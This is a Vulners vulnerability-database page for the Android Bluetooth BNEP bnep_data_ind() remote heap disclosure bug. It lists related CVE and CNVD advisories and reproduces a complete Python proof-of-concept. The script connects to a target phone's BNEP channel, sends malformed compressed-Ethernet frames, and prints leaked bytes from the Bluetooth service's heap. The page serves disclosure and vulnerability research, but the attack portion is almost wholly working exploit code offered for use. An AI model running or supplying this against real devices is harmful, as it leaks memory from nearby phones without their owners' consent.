Vulners
Lucene search
Android Bluetooth BNEP bnep_data_ind() Remote Heap Disclosure
| Reporter | Title | Published | Views | Family All 26 |
|---|---|---|---|---|
 | Android Bluetooth - BNEP bnep_data_ind() Remote Heap Disclosure Exploit | 23 Mar 201800:00 | – | zdt |
| Android Bluetooth - BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read Exploit | 23 Mar 201800:00 | – | zdt |
 | Android Security Bulletin—March 2018Stay organized with collectionsSave and categorize content based on your preferences. | 5 Mar 201800:00 | – | androidsecurity |
 | Google Android System Component Information Disclosure Vulnerability (CNVD-2018-06622) | 7 Mar 201800:00 | – | cnvd |
| Google Android System Component Information Disclosure Vulnerability (CNVD-2018-06624) | 7 Mar 201800:00 | – | cnvd |
| Google Android System Component Information Disclosure Vulnerability (CNVD-2018-06625) | 7 Mar 201800:00 | – | cnvd |
| Google Android System Component Information Disclosure Vulnerability (CNVD-2018-06626) | 7 Mar 201800:00 | – | cnvd |
 | CVE-2017-13258 | 4 Apr 201817:00 | – | cve |
| CVE-2017-13260 | 4 Apr 201817:00 | – | cve |
| CVE-2017-13261 | 4 Apr 201817:00 | – | cve |
10
`import os
import sys
import struct
import bluetooth
BNEP_PSM = 15
BNEP_FRAME_COMPRESSED_ETHERNET = 0x02
LEAK_ATTEMPTS = 20
def leak(src_bdaddr, dst):
bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP)
bnep.settimeout(5)
bnep.bind((src_bdaddr, 0))
print 'Connecting to BNEP...'
bnep.connect((dst, BNEP_PSM))
bnep.settimeout(1)
print 'Leaking bytes from the heap of com.android.bluetooth...'
for i in range(LEAK_ATTEMPTS):
# A byte from the heap at (p + controlled_length) will be leaked
# if it's greater than BNEP_FILTER_MULTI_ADDR_RESPONSE_MSG (0x06).
# This BNEP packet can be seen in Wireshark with the following info:
# "Compressed Ethernet+E - Type: unknown[Malformed packet]".
# The response sent by bnep_send_command_not_understood() contains 3 bytes:
# 0x01 (BNEP_FRAME_CONTROL) + 0x00 (BNEP_CONTROL_COMMAND_NOT_UNDERSTOOD) + leaked byte
# 0x82 & 0x80 == 0x80 -> Extension flag = True. 0x82 & 0x7f == 0x2 -> type
type_and_ext_present = BNEP_FRAME_COMPRESSED_ETHERNET | 0x80
# 0x80 -> ext -> we need to pass this check: !(ext & 0x7f)
ext = 0x80
# i -> length (the 'p' pointer is advanced by this length)
bnep.send(struct.pack('<BBB', type_and_ext_present, ext, i))
try:
data = bnep.recv(3)
except bluetooth.btcommon.BluetoothError:
data = ''
if data:
print 'heap[p + 0x%02x] = 0x%02x' % (i, ord(data[-1]))
else:
print 'heap[p + 0x%02x] <= 6' % (i)
print 'Closing connection.'
bnep.close()
def main(src_bdaddr, dst):
os.system('hciconfig %s sspmode 0' % (src_bdaddr,))
os.system('hcitool dc %s' % (dst,))
leak(src_bdaddr, dst)
if __name__ == '__main__':
if len(sys.argv) < 3:
print('Usage: python bnep01.py <src-bdaddr> <dst-bdaddr>')
else:
if os.getuid():
print 'Error: This script must be run as root.'
else:
main(sys.argv[1], sys.argv[2])
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Mar 2018 00:00Current
7High risk
Vulners AI Score7
EPSS0.33566